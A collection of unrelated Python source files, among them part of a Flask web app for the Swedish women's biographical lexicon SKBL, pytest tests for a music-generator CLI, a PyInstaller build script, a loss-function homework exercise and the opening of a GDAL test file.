lang = "sv" if "sv" in request.url_rule.rule else "en"
if not usecache or current_app.config["TEST"]:
return None, lang
pagename = helpers.cache_name(page, lang=lang)
try:
with g.mc_pool.reserve() as client:
# Look for the page, return if found
art = client.get(pagename)
if art is not None:
return art, lang
# Ff not, look for the backup of the page and return
art = client.get(pagename + "_backup")
if art is not None:
return art, lang
except Exception:
# TODO what to do??
pass
# If nothing is found, return None
return None, lang
def copytobackup(fields, lang):
"""Make backups of all requested fields to their corresponding backup field."""
for field in fields:
with g.mc_pool.reserve() as client:
art = client.get(field + lang)
client.set(helpers.cache_name(field, lang) + "_backup", art, time=current_app.config["CACHE_TIME"])
def searchresult(result, name="", searchfield="", imagefolder="", query="",
searchtype="equals", title="", authorinfo=False, lang="",
show_lang_switch=True, cache=True):
"""Compute the search result."""
helpers.set_language_switch_link("%s_index" % name, result)
try:
result = result
pagename = name + "_" + urllib.parse.quote(result)
art = helpers.check_cache(pagename, lang)
if art is not None:
return art
show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng"])
if query:
hits = helpers.karp_query("minientry", {"q": query, "show": show})
else:
hits = helpers.karp_query("minientry",
{"q": "extended||and|%s.search|%s|%s" % (searchfield, searchtype, result),
"show": show})
title = title or result
no_hits = hits["hits"]["total"]
if no_hits > 0:
picture = None
if os.path.exists(current_app.config.root_path + "/static/images/%s/%s.jpg" % (imagefolder, result)):
picture = "/static/images/%s/%s.jpg" % (imagefolder, result)
page = render_template("list.html", picture=picture,
alphabetic=True, title=title,
headline=title, hits=hits["hits"],
authorinfo=authorinfo,
show_lang_switch=show_lang_switch)
if no_hits >= current_app.config["CACHE_HIT_LIMIT"]:
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name(pagename, lang), page, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return page
else:
return render_template("page.html", content=gettext("Contents could not be found!"))
except Exception as e:
return render_template("page.html",
content="%s\n%s: extended||and|%s.search|%s|%s" % (e, current_app.config["KARP_BACKEND"], searchfield, searchtype, result))
def compute_organisation(lang="", infotext="", cache=True, url=""):
"""Compute organisation view."""
helpers.set_language_switch_link("organisation_index", lang=lang)
art, lang = getcache("organisation", lang, cache)
if art is not None:
return art
infotext = helpers.get_infotext("organisation", request.url_rule.rule)
if lang == "en":
data = helpers.karp_query("minientry", {"q": "extended||and|anything|regexp|.*",
"show": "organisationsnamn,organisationstyp_eng"})
typefield = "type_eng"
else:
data = helpers.karp_query("minientry", {"q": "extended||and|anything|regexp|.*",
"show": "organisationsnamn,organisationstyp"})
typefield = "type"
nested_obj = {}
for hit in data["hits"]["hits"]:
for org in hit["_source"].get("organisation", []):
orgtype = helpers.unescape(org.get(typefield, "-"))
if orgtype not in nested_obj:
nested_obj[orgtype] = defaultdict(set)
nested_obj[orgtype][org.get("name", "-")].add(hit["_id"])
art = render_template("nestedbucketresults.html",
results=nested_obj, title=gettext("Organisations"),
infotext=infotext, name="organisation", page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("organisation", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def compute_activity(lang="", cache=True, url=""):
"""Compute activity view."""
helpers.set_language_switch_link("activity_index", lang=lang)
art, lang = getcache("activity", lang, cache)
if art is not None:
return art
infotext = helpers.get_infotext("activity", request.url_rule.rule)
# Fix list with references to be inserted in results
reference_list = static_info.activities_reference_list
[ref.append("reference") for ref in reference_list]
art = bucketcall(queryfield="verksamhetstext", name="activity",
title=gettext("Activities"), infotext=infotext,
alphabetical=True,
description=helpers.get_shorttext(infotext),
insert_entries=reference_list,
page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("activity", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def compute_article(lang="", cache=True, url="", map=False):
"""Compute article view."""
helpers.set_language_switch_link("article_index", lang=lang)
art, lang = getcache("article", lang, cache)
if art is not None:
return art
show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng", "platspinlat.bucket", "platspinlon.bucket"])
infotext = helpers.get_infotext("article", request.url_rule.rule)
if lang == "sv":
data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
"sort": "sorteringsnamn.sort,sorteringsnamn.init,tilltalsnamn.sort"},
mode=current_app.config["SKBL_LINKS"])
else:
data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
"sort": "sorteringsnamn.eng_sort,sorteringsnamn.eng_init,sorteringsnamn.sort,tilltalsnamn.sort"},
mode=current_app.config["SKBL_LINKS"])
if map:
art = render_template("map.html",
hits=data["hits"],
headline=gettext("Map"),
infotext=infotext,
title="Map",
page_url=url)
else:
art = render_template("list.html",
hits=data["hits"],
headline=gettext("Women A-Z"),
alphabetic=True,
split_letters=True,
infotext=infotext,
title="Articles",
page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("article", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def compute_map(lang="", cache=True, url=""):
"""Compute article view."""
helpers.set_language_switch_link("map", lang=lang)
art, lang = getcache("map", lang, cache)
if art is not None:
return art
show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng", "platspinlat.bucket", "platspinlon.bucket"])
infotext = helpers.get_infotext("map", request.url_rule.rule)
if lang == "sv":
data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
"sort": "sorteringsnamn.sort,sorteringsnamn.init,tilltalsnamn.sort"},
mode=current_app.config["KARP_MODE"])
else:
data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
"sort": "sorteringsnamn.eng_sort,sorteringsnamn.eng_init,sorteringsnamn.sort,tilltalsnamn.sort"},
mode=current_app.config["KARP_MODE"])
if map:
art = render_template("map.html",
hits=data["hits"],
headline=gettext("Map"),
infotext=infotext,
title="Map",
page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("map", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def compute_place(lang="", cache=True, url=""):
"""Compute place view."""
helpers.set_language_switch_link("place_index", lang=lang)
art, lang = getcache("place", lang, cache)
if art is not None:
return art
infotext = helpers.get_infotext("place", request.url_rule.rule)
def parse(kw):
place = kw.get("key")
# May be used to parse names with or without coordinates:
# "Lysekil" or "Lysekil|58.275573|11.435558"
if "|" in place:
name, lat, lon = place.split("|")
else:
name = place.strip()
lat, lon = 0, 0
placename = name if name else "%s, %s" % (lat, lon)
return {"name": placename, "lat": lat, "lon": lon,
"count": kw.get("doc_count")}
def has_name(kw):
name = kw.get("key").split("|")[0]
if name and "(<NAME>)" not in name:
return name
else:
return None
# To use the coordinates, use "getplaces" instead of "getplacenames"
data = helpers.karp_query("getplacenames/" + current_app.config["KARP_MODE"], {})
stat_table = [parse(kw) for kw in data["places"] if has_name(kw)]
art = render_template("places.html",
places=stat_table,
title=gettext("Placenames"),
infotext=infotext,
description=helpers.get_shorttext(infotext),
page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("place", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def compute_artikelforfattare(infotext="", description="", lang="", cache=True, url=""):
"""Compute authors view."""
helpers.set_language_switch_link("articleauthor_index", lang=lang)
art, lang = getcache("author", lang, cache)
if art is not None:
return art
q_data = {"buckets": "artikel_forfattare_fornamn.bucket,artikel_forfattare_efternamn.bucket"}
data = helpers.karp_query("statlist", q_data)
# strip kw0 to get correct sorting
stat_table = [[kw[0].strip()] + kw[1:] for kw in data["stat_table"] if kw[0] != ""]
stat_table = [[kw[1] + ",", kw[0], kw[2]] for kw in stat_table]
# Remove duplicates and some wrong ones (because of backend limitation)
# For articles that have more than one author the non existing name combinations are listed here.
stoplist = {
"Grevesmühl,Kajsa": True,
"Ohrlander,Anders": True,
"Petré,Stefan": True,
"Hammenbeck,Margareta": True,
"<NAME>": True,
"Burström,Nanouschka": True,
"Ljung,Yvonne": True,
"Lindholm,Barbro": True,
"Formark,Fredrik": True,
"Mandelin,Bodil": True,
"Sedin,Els-Marie": True,
"Rådström,Inger": True,
"Mannerheim,Madeleine": True,
"Kleberg,Ylva": True,
"Kärnekull,Anneka ": True,
"Kärnekull,Ingrid": True,
"Kärnekull,Paul": True,
"Kärnekull,Per": True,
"Lewis,Ingrid": True,
"Lewis,Kerstin": True,
"Lewis,Paul": True,
"Lewis,Per": True,
"Rydberg,Anette": True,
"Rydberg,Anneka": True,
"Rydberg,Kerstin": True,
"Rydberg,Paul": True,
"Rydberg,Per": True,
"Anderson,Anneka": True,
"Anderson,Ingrid": True,
"Anderson,Kerstin": True
}
added = {}
new_stat_table = []
for item in stat_table:
fullname = item[0] + item[1]
if fullname not in added and fullname not in stoplist:
new_stat_table.append(item)
added[fullname] = True
art = render_template("bucketresults.html", results=new_stat_table,
alphabetical=True, title=gettext("Article authors"),
name="articleauthor", infotext=infotext,
description=description, sortnames=True,
page_url=url)
try:
with g.mc_pool.reserve() as client:
client.set(helpers.cache_name("author", lang), art, time=current_app.config["CACHE_TIME"])
except Exception:
# TODO what to do?
pass
return art
def bucketcall(queryfield="", name="", title="", sortby="", lastnamefirst=False,
infotext="", description="", query="", alphabetical=False,
insert_entries=None, page_url=""):
"""Bucket call helper."""
q_data = {"buckets": "%s.bucket" % queryfield}
if query:
q_data["q"] = query
data = helpers.karp_query("statlist", q_data)
# Strip kw0 to get correct sorting
stat_table = [[kw[0].strip()] + kw[1:] for kw in data["stat_table"] if kw[0] != ""]
# Insert entries that function as references
if insert_entries:
stat_table.extend(insert_entries)
if sortby:
stat_table.sort(key=sortby)
else:
stat_table.sort(key=lambda x: x[0])
if lastnamefirst:
stat_table = [[kw[1] + ",", kw[0], kw[2]] for kw in stat_table]
# if showfield:
# stat_table = [[showfield(kw), kw[2]] for kw in stat_table]
return render_template("bucketresults.html", results=stat_table,
alphabetical=alphabetical, title=gettext(title),
name=name, infotext=infotext,
description=description,
page_url=page_url)
def compute_emptycache(fields):
"""
Empty the cache (but leave the backupfields).
Only users with write permission may do this
May raise error, eg if the authorization does not work
"""
emptied = False
auth = request.authorization
postdata = {}
user, pw = auth.username, auth.password
postdata["username"] = user
postdata["password"] = pw
postdata["checksum"] = md5(user.encode() + pw.encode() + current_app.config["SECRET_KEY"].encode()).hexdigest()
server = current_app.config["WSAUTH_URL"]
contents = urlopen(server, urllib.parse.urlencode(postdata).encode()).read()
auth_response = json.loads(contents)
lexitems = auth_response.get("permitted_resources", {})
rights = lexitems.get("lexica", {}).get(current_app.config["KARP_LEXICON"], {})
if rights.get("write"):
with g.mc_pool.reserve() as client:
for field in fields:
client.delete(field + "sv")
client.delete(field + "en")
emptied = True
return emptied
def compute_contact_form():
"""Compute view for contact form ."""
helpers.set_language_switch_link("contact")
email = request.form["email"].strip()
required_fields = ["name", "email"]
if request.form["mode_switch"] == "suggest_new":
mode = "suggestion"
required_fields.extend(["subject_name", "subject_lifetime",
"subject_activity", "motivation"])
elif request.form["mode_switch"] == "correction":
mode = "correction"
required_fields.append("message")
else:
mode = "other"
required_fields.append("message")
error_msgs = []
errors = []
for field in required_fields:
if not request.form[field]:
error_msgs.append(gettext("Please enter all the fields!"))
errors.append(field)
if email and not helpers.is_email_address_valid(email):
error_msgs.append(gettext("Please enter a valid email address!"))
# Render error messages and tell user what went wrong
error_msgs = list(set(error_msgs))
if error_msgs:
return render_template("contact.html",
title=gettext("Contact"),
headline=gettext("Contact SKBL"),
errors=error_msgs,
name_error=True if "name" in errors else False,
email_error=True if "email" in errors else False,
message_error=True if "message" in errors else False,
subject_name_error=True if "subject_name" in errors else False,
subject_lifetime_error=True if "subject_lifetime" in errors else False,
subject_activity_error=True if "subject_activity" in errors else False,
motivation_error=True if "motivation" in errors else False,
form_data=request.form,
mode=mode)
else:
return make_email(request.form, mode)
def make_email(form_data, mode="other"):
"""Compose and send email from contact form."""
name = form_data["name"].strip()
email = form_data["email"].strip()
recipient = current_app.config["EMAIL_RECIPIENT"]
complete_sender = "%s <%s>" % (name, email)
# If email adress contains non-ascii chars it won't be accepted by the server as sender.
# Non-ascii chars in the name will produce weirdness in the from-field.
if helpers.is_ascii(email) and helpers.is_ascii(name):
sender = complete_sender
elif helpers.is_ascii(email):
sender = email
else:
sender = recipient
if mode == "suggestion":
text = ["%s har skickat in ett förslag för en ny SKBL-ingång.\n\n" % complete_sender]
text.append("Förslag på kvinna: %s\n" % form_data["subject_name"])
text.append("Kvinnas levnadstid: %s\n" % form_data["subject_lifetime"])
text.append("Kvinnas verksamhet: %s\n" % form_data["subject_activity"])
text.append("Motivering: %s\n" % form_data["motivation"])
text = "".join(text)
subject = "Förslag för ny ingång i skbl.se"
elif mode == "correction":
text = "%s har skickat följande meddelande:\n\n%s" % (complete_sender, form_data["message"])
subject = "Förslag till rättelse (skbl.se)"
else:
text = "%s har skickat följande meddelande:\n\n%s" % (complete_sender, form_data["message"])
subject = "Förfrågan från skbl.se"
html = text.replace("\n", "<br>")
part1 = MIMEText(text, "plain", "utf-8")
part2 = MIMEText(html, "html", "utf-8")
msg = MIMEMultipart("alternative")
msg.attach(part1)
msg.attach(part2)
msg["Subject"] = subject
msg["To"] = recipient
msg["From"] = sender
server = smtplib.SMTP(current_app.config["EMAIL_SERVER"])
server.sendmail(sender, recipient, msg.as_string())
server.quit()
# Render user feedback
return render_template("form_submitted.html",
title=gettext("Thank you for your feedback") + "!",
headline=gettext("Thank you for your feedback") + ", " + name + "!",
text=gettext("We will get back to you as soon as we can."))
|
# -*- coding: utf-8 -*-
"""Tests for the cli module"""
import pytest
from bach_generator import cli
def test_no_filepath():
parser = cli.construct_parser()
with pytest.raises(SystemExit):
parser.parse_args("")
@pytest.mark.parametrize(
"input_args, expected", [("a", "a"), ("test_dir/test.midi", "test_dir/test.midi")]
)
def test_filepath(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.filepath == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --generations 12", 12),
("a -g 3", 3),
],
)
def test_generations(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.generations == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a", False),
("a --save", True),
],
)
def test_save(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.save == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a", None),
("a --load test.json", "test.json"),
],
)
def test_load(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.load_filepath == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a", None),
("a --load-best 23", 23),
],
)
def test_load_best(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.load_best == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --models 234", 234),
("a -m 4", 4),
],
)
def test_models(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.models == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --inputs 234", 234),
("a -i 45", 45),
],
)
def test_inputs(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.inputs == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --layers 2", 2),
("a -l 56", 56),
],
)
def test_layers(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.layers == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --layer-size 23", 23),
("a -ls 56", 56),
],
)
def test_layer_size(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.layer_size == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --select-models 26", 26),
("a -s 56", 56),
],
)
def test_select_models(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.select_models == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --clones 8", 8),
("a -c 98", 98),
],
)
def test_clones(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.clones == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --weight-jumble-by=factor", "factor"),
("a -wj=selection", "selection"),
],
)
def test_weight_jumble_strategy(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.weight_jumble_strategy == expected
@pytest.mark.parametrize(
"input_args",
[
"a --weight-jumble-by=factor3",
"a -wj",
],
)
def test_weight_jumble_strategy_fail(input_args):
parser = cli.construct_parser()
with pytest.raises(SystemExit):
parser.parse_args(input_args.split())
@pytest.mark.parametrize(
"input_args, expected",
[
("a --weight-divergence 0.1", 0.1),
("a -wd=-0.5", -0.5),
],
)
def test_weight_divergence(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.weight_divergence == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --write-interval 4", 4),
("a -wi 23", 23),
],
)
def test_write_interval(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.write_interval == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --output-dir abc", "abc"),
("a -o b", "b"),
],
)
def test_output_dir(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.output_dir == expected
@pytest.mark.parametrize(
"input_args, expected",
[
("a --rhythm simple", "simple"),
("a -r copy", "copy"),
],
)
def test_rhythm(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.rhythm_handler == expected
@pytest.mark.parametrize(
"input_args",
[
"a --rhythm ere",
"a -r",
],
)
def test_rhythm_fail(input_args):
parser = cli.construct_parser()
with pytest.raises(SystemExit):
parser.parse_args(input_args.split())
@pytest.mark.parametrize(
"input_args, expected",
[
("a", None),
("a --seed 2", 2),
],
)
def test_seed(input_args, expected):
parser = cli.construct_parser()
args = parser.parse_args(input_args.split())
assert args.seed == expected
def test_display_args():
"display args smoke test"
parser = cli.construct_parser()
args = parser.parse_args(["a"])
cli.display_args(args)
|
<filename>pyinstaller_exe.py<gh_stars>1-10
#!/usr/bin/env python3
"""Generate .exe files with PyInstaller."""
from os import devnull, getcwd, listdir, makedirs, remove
from os.path import basename, exists, join
from platform import architecture
from shutil import copy, copytree, rmtree
from subprocess import STDOUT, call
from requests import certs, get
from bbarchivist.bbconstants import (CAP, COMMITDATE, JSONDIR, LONGVERSION, VERSION)
from bbarchivist.utilities import get_seven_zip, prep_seven_zip
__author__ = "Thurask"
__license__ = "WTFPL v2"
__copyright__ = "2016-2019 Thurask"
def write_versions():
"""
Write temporary version files.
"""
with open("version.txt", "w") as afile:
afile.write(VERSION)
with open("longversion.txt", "w") as afile:
afile.write("{0}\n{1}".format(LONGVERSION, COMMITDATE))
def clean_versions():
"""
Remove temporary version files.
"""
remove("version.txt")
remove("longversion.txt")
def is_64bit():
"""
Check if system is 64-bit.
"""
is64 = True if architecture()[0] == "64bit" else False
return is64
def bit_tail():
"""
String form of 64-bit checking.
"""
tail = "x64" if is_64bit() else "x86"
return tail
def bitsdir(indir):
"""
Create directories based on indir segregated on bit type.
:param indir: Directory to modify.
:type indir: str
"""
indirx = "{0}-64".format(indir) if is_64bit() else indir
if exists(indirx):
clean_outdir(indirx)
makedirs(indirx)
return indirx
def get_ucrt_dlls():
"""
Get some magic voodoo Windows DLLs.
"""
tail = bit_tail()
pfiles = "Program Files (x86)" if tail == "x64" else "Program Files"
folder = join("C:\\", pfiles, "Windows Kits", "10", "Redist", "ucrt", "DLLs", tail)
return folder
def generate_specs():
"""
Generate pyinstaller spec files.
"""
scripts = ["archivist", "autolookup", "barlinker", "carrierchecker", "certchecker", "devloader", "downloader", "droidlookup", "droidscraper", "escreens", "kernchecker", "lazyloader", "linkgen", "metachecker", "swlookup", "tclscan", "tcldelta", "tclnewprd"]
here = getcwd().replace("\\", "\\\\")
dlldir = get_ucrt_dlls().replace("\\", "\\\\")
tail = bit_tail()
for script in scripts:
template = "# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['bbarchivist\\\\scripts\\\\{0}.py'],\n pathex=['{1}', '{2}'],\n binaries=None,\n datas=None,\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='{0}',\n debug=False,\n strip=False,\n upx=False,\n console=True )\n".format(script, here, dlldir)
with open("{0}.{1}.spec".format(script, tail), "w") as afile:
afile.write(template)
def clean_specs():
"""
Remove pyinstaller spec files.
"""
tail = bit_tail()
specs = [x for x in listdir() if x.endswith("{0}.spec".format(tail))]
for spec in specs:
remove(spec)
def get_sevenzip():
"""
Get 7-Zip.
"""
szver = "1900"
szurl = "http://www.7-zip.org/a/7z{0}-extra.7z".format(szver)
psz = prep_seven_zip()
if psz:
get_sevenzip_write(szurl)
else:
print("GO TO {0} AND DO IT MANUALLY".format(szurl))
raise SystemError
def get_sevenzip_write(szurl):
"""
Download 7-Zip file.
:param szurl: Link to 7z download.
:type szurl: str
"""
szexe = get_seven_zip()
szfile = basename(szurl)
with open(szfile, "wb") as afile:
req = get(szurl, stream=True)
for chunk in req.iter_content(chunk_size=1024):
afile.write(chunk)
cmd = "{0} x {1} -o7z".format(szexe, szfile)
with open(devnull, "wb") as dnull:
call(cmd, stdout=dnull, stderr=STDOUT, shell=True)
remove(basename(szurl))
def call_specs(distdir, builddir):
"""
Call pyinstaller to make specs.
:param distdir: Path to distribute files.
:type distdir: str
:param builddir: Path to build files.
:type builddir: str
"""
tail = bit_tail()
specs = [x for x in listdir() if x.endswith("{0}.spec".format(tail))]
for spec in specs: # use UPX 3.93 or up
cmd = "pyinstaller --onefile --workpath {2} --distpath {1} {0}".format(spec, distdir, builddir)
call(cmd, shell=True)
def sz_wrapper(outdir):
"""
Copy 7-Zip to outdir.
:param outdir: Output directory.
:type outdir: str
"""
try:
get_sevenzip()
except SystemError:
pass
else:
sz_wrapper_writer(outdir)
def sz_wrapper_writer(outdir):
"""
Copy 7-Zip to outdir, the actual function.
:param outdir: Output directory.
:type outdir: str
"""
copy(join("7z", "7za.exe"), outdir)
if is_64bit():
copy(join("7z", "x64", "7za.exe"), join(outdir, "7za64.exe"))
rmtree("7z", ignore_errors=True)
def copy_json(outdir):
"""
Copy JSON folder to outdir.
:param outdir: Output directory.
:type outdir: str
"""
copytree(JSONDIR, join(outdir, "json"))
def clean_outdir(outdir):
"""
Nuke outdir, if it exists.
:param outdir: Output directory.
:type outdir: str
"""
if exists(outdir):
rmtree(outdir, ignore_errors=True)
def main():
"""
Create .exes with dynamic spec files.
"""
outdir = bitsdir("pyinst-dist")
builddir = bitsdir("pyinst-build")
write_versions()
generate_specs()
call_specs(outdir, builddir)
copy("version.txt", outdir)
copy("longversion.txt", outdir)
copy(CAP.location, outdir)
copy_json(outdir)
copy(certs.where(), join(outdir, "cacerts.pem"))
sz_wrapper(outdir)
clean_versions()
clean_specs()
if __name__ == "__main__":
main()
|
#coding=utf8
"""
Created on Thu Mar 12 17:48:23 2020
@author: <NAME>
Hint max() is a built-in function in Python
"""
import pickle
import matplotlib.pyplot as plt
import numpy as np
def hinge_loss(f_x,y_true,margin=1):
"""
Compute the hinge loss given the returned value from
a linear discrimination function on the feature x and its label y
"""
return max(0,margin-y_true*f_x)
# pass #++insert your code here to replace pass++
def zero_one_loss(f_x,y_true):
"""
Compute the zero-one loss given the returned value from
a linear discrimination function on the feature x and its label y
"""
if f_x*y_true>=0:
return 0
else:
return 1
with open('Q2_fetures.pkl','rb') as rf:
X = pickle.load(rf)
with open('Q2_labels.pkl','rb') as rf:
Y_true = pickle.load(rf)
Y_true[Y_true==0]=-1
print(len(X),len(Y_true))
def linear_func(W,X):
"""
General form of a 2-d linear function with w0 as intercept
"""
return W[0]+W[1]*X[0]+W[2]*X[1]
def boundary_line(W,x):
y= -(W[0]+W[1]*x)/W[2]
return y
W = (-0.45236953,2.23604794, -3.94803128)
#f(x) = -0.45236953+2.23604794*X[0]-3.94803128*X[1] = 0
# ->3.94803128*X[1] = -0.45236953+2.23604794*X[0]
# y = (-0.45236953+2.23604794*x)/3.94803128
plt.figure(1, figsize=(8, 8))
plt.scatter(X[:, 0], X[:, 1], c=Y_true)
#generate dense plots
s = np.arange(min(X[:, 0]),max(X[:, 0]),0.1)
#generate the corresponding y for each z in s
t = []
for z in s:
t.append((-0.45236953+2.23604794*z)/3.94803128)
#plt.plot(s, t,label = 'W')
#
W1 = (-0.762686,1.50126098,-2.3948365 )
W2 = (-0.422686,1.50126098,-2.3948365 )
W3 = (-0.59862686,1.50126098,-2.3948365)
# W1 = (-0.5986268-1,1.50126098,-2.3948365 )
# W2 = (-0.5986268+1,1.50126098,-2.3948365 )
# W3 = (-0.59862686,1.50126098,-2.3948365 )
W1 = (-0.59862686-0.17,1.50126098,-2.3948365 )
W2 = (-0.59862686+0.17,1.50126098,-2.3948365 )
W3 = (-0.59862686,1.50126098,-2.3948365 )
for W, label in zip((W1,W2,W3), ('W1','W2','W3')):
#zip((W1,W2,W3), ('W1','W2','W3')) = [(W1,'W1',1),(W2,'w2',2),(W3,'W3',3)]
t = [boundary_line(W, x) for x in s]
plt.plot(s, t, label = label)
plt.legend()
plt.show()
# #class zip(object)
# | zip(*iterables) --> zip object
# |
# | Return a zip object whose .__next__() method returns a tuple where
# | the i-th element comes from the i-th iterable argument. The .__next__()
# | method continues until the shortest iterable in the argument sequence
# | is exhausted and then it raises StopIteration.
# 对应相同维度的数据
# zip.__next__() 相当于 next(), iteration结束后都会报错
#Compute zero_one_loss
print("\nZero one loss:")
for W, label in zip((W1,W2,W3), ('W1','W2','W3')): # 对应赋值, zip 函数
zero_one_loss_total = 0
for i in range(len(X)):
x_i = X[i]
f_x_i=linear_func(W,x_i)
y_i = Y_true[i]
loss = zero_one_loss(f_x_i,y_i)
if loss >0:
# print(i,f_x_i,y_i,loss)
zero_one_loss_total+=loss
print(label, zero_one_loss_total)
#Compute hinge loss
print("\nHinge loss:")
for W, label in zip((W1,W2,W3), ('W1','W2','W3')):
hinge_loss_total = 0
for i in range(len(X)):
x_i = X[i]
f_x_i=linear_func(W,x_i)
y_i = Y_true[i]
loss = hinge_loss(f_x_i,y_i,1)
if loss >0:
hinge_loss_total+=loss
print(label, hinge_loss_total)
|
<reponame>nicoguillier/gdal<filename>autotest/pyscripts/test_gdal_calc.py
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id: test_gdal_calc.py 25549 2013-01-26 11:17:10Z rouault $
#
# Project: GDAL/OGR Test Suite
# Purpose: gdal_calc.py testing
# Author: <NAME> <etourigny dot dev @ gmail dot com>
#
###############################################################################
# Copyright (c) 2013, <NAME> <<EMAIL>>
# Copyright (c) 2014, <NAME> <etourigny dot dev @ <EMAIL> dot <EMAIL>>
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import shutil
from copy import copy
from osgeo import gdal
import test_py_scripts
import pytest
from collections import defaultdict
# test that numpy is available, if not skip all tests
try:
import numpy as np
from osgeo.utils import gdal_calc
from osgeo.gdal_array import GDALTypeCodeToNumericTypeCode
numpy_available = True
except (ImportError, AttributeError):
numpy_available = False
# Usage: gdal_calc.py [-A <filename>] [--A_band] [-B...-Z filename] [other_options]
def check_file(filename_or_ds, checksum, i=None, bnd_idx=1):
if gdal_calc.is_path_like(filename_or_ds):
ds = gdal.Open(filename_or_ds)
else:
ds = filename_or_ds
assert ds is not None, 'ds{} not found'.format(i if i is not None else '')
ds_checksum = ds.GetRasterBand(bnd_idx).Checksum()
if checksum is None:
print('ds{} bnd{} checksum is {}'.format(i, bnd_idx, ds_checksum))
else:
assert ds_checksum == checksum, 'ds{} bnd{} wrong checksum, expected {}, got {}'.format(i, bnd_idx, checksum, ds_checksum)
return ds
temp_counter_dict = defaultdict(int)
opts_counter_counter = 0
input_checksum = (12603, 58561, 36064, 10807)
def get_input_file():
infile = make_temp_filename(0)
if not os.path.isfile(infile):
shutil.copy('../gcore/data/stefan_full_rgba.tif', infile)
return infile
def format_temp_filename(test_id, idx, is_opt=False):
if not is_opt:
out_template = 'tmp/test_gdal_calc_py{}.tif'
return out_template.format('' if test_id == 0 else '_{}_{}'.format(test_id, idx))
else:
opts_template = 'tmp/opt{}'
return opts_template.format(idx)
def make_temp_filename(test_id, is_opt=False):
if not is_opt:
global temp_counter_dict
temp_counter_dict[test_id] = 1 + (temp_counter_dict[test_id] if test_id else 0)
idx = temp_counter_dict[test_id]
else:
global opts_counter_counter
